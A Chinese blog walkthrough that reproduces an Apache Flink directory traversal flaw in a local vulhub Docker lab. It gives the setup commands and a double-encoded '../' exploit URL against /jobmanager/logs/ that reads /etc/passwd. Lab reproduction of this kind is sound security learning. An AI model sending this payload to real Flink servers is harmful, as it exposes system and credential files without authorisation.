apache flink目录遍历漏洞(CVE-2020-17518复现)

漏洞描述:

apache Flink目录遍历漏洞,可通过REST API读/写远程文件

影响版本:

Flink 1.5.1-1.11.2

接下来开始复现:

我们通过vulhub进行复现

打开vulhub上的flink里的cve-2020-17518

apache flink目录遍历漏洞(CVE-2020-17518复现)_第1张图片

使用docker-compose配置相关环境:(在靶场cve-2020-17518使用下面的指令)

docker-compose up -d
sudo docker-compose up -d

然后输入kali密码即可成功启动环境

apache flink目录遍历漏洞(CVE-2020-17518复现)_第2张图片

接下来我们查看当前环境:

在靶场终端输入:

docker ps

但是在我的kali2022上面出现了报错:

Got permission denied while trying to connect to the Docker daemon socket...

8行,和上一篇文章出现了一样的问题,上网搜索解决

先放大佬博客,里面有讲原理,简单说就是我们要用sudo获取root权限才行

[Linux] docker 出现Got permission denied while trying to connect to the Docker daemon socket...问题的解决办法_Cloudeeeee的博客-CSDN博客

1.

sudo groupadd docker

2.

sudo gpasswd -a $USER docker

3.

newgrp docker

4.

docker images

即可成功解决问题

apache flink目录遍历漏洞(CVE-2020-17518复现)_第3张图片

解决后可以看到端口是8081

接下来我们浏览器访问

http://127.0.0.1:8081/

apache flink目录遍历漏洞(CVE-2020-17518复现)_第4张图片

构造exp: 

http://127.0.0.1:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

可以看到成功复现,出现了root

apache flink目录遍历漏洞(CVE-2020-17518复现)_第5张图片

最后一步: 清理环境

docker-compose down

apache flink目录遍历漏洞(CVE-2020-17518复现)_第6张图片 done

成功清理靶场

 

你可能感兴趣的:(flink,安全,大数据)